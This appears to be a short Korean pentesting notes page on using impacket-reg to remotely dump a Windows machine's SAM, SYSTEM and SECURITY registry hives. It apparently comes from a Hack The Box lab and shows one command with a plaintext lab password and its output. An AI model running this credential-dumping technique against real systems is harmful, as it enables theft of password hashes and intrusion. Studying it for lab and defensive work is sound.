reg

1. 개요

reg save 작업을 원격으로 진행한다.

evil-winrm 으로 원격으로 접속하지 않고 원격으로 SAM 파일과 SYSTEM 파일을 만들어서 저장해놓을 수 있다. 그 이후에 smbclientnxc 등을 이용해 해당 경로에 있는 파일을 다운로드 할 수 있다.

2. 사용법

┌──(root㉿kali)-[/home/kali]
└─# impacket-reg 'cicada.htb/emily.oscars:Q!3@Lp#M6b*7t*Vt'@10.129.38.228 backup -o 'C:\windows\temp\'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to C:\windows\temp\\SAM.save
[*] Saved HKLM\SYSTEM to C:\windows\temp\\SYSTEM.save
[*] Saved HKLM\SECURITY to C:\windows\temp\\SECURITY.save
Updated on
lookupsid
secretsdump